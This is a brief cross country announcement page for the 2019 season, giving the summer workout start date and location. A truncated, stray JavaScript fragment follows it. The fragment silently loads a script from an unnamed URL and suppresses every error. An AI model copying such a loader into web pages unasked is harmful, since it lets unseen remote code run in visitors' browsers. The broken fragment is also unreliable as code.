Cross Country
Attention Parents and Athletes: The 2019 XC season is here…..
Summer Workouts for Cross Country will start on Monday, June 10th at 7:00 AM at Lakota Plains. All other Information and a complete schedule can be found by clicking the link here
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();